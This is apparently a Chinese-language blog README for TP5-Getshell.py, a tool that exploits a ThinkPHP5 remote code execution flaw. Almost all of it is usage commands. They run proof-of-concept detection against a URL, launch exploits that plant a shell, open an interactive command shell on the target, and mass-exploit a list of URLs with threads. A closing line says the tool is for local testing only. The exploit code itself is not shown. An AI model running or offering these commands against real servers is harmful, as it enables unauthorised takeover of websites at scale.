概述

控制器过滤不严导致rce,漏洞详情参考 thinkphp5 RCE漏洞重现及分析

快速开始

python tp5-getshell.py -h
TP5-Getshell.py – Thinkphp5 RCE漏洞检测工具-Ti0s's Blog

单url检测(poc)

使用4种poc检测

python tp5-getshell.py -u http://www.xxx.com:8888/think5124/public/
TP5-Getshell.py – Thinkphp5 RCE漏洞检测工具-Ti0s's Blog

单url检测(getshell)

使用3种exp进行getshell,遇到先成功的exp就停止,防止重复getshell

python tp5-getshell.py -u http://www.xxx.com:8888/think5124/public/ –exploit
TP5-Getshell.py – Thinkphp5 RCE漏洞检测工具-Ti0s's Blog

单url检测(命令行shell模式)

python tp5-getshell.py -u http://www.xxx.com/ –cmdshell
TP5-Getshell.py – Thinkphp5 RCE漏洞检测工具-Ti0s's Blog

批量检测(getshell)

使用3种exp进行getshell,遇到先成功的exp就停止,防止重复getshell

python tp5-getshell.py -f urls.txt -t 2 -s 10
TP5-Getshell.py – Thinkphp5 RCE漏洞检测工具-Ti0s's Blog

切勿用于违法 仅供本地测试使用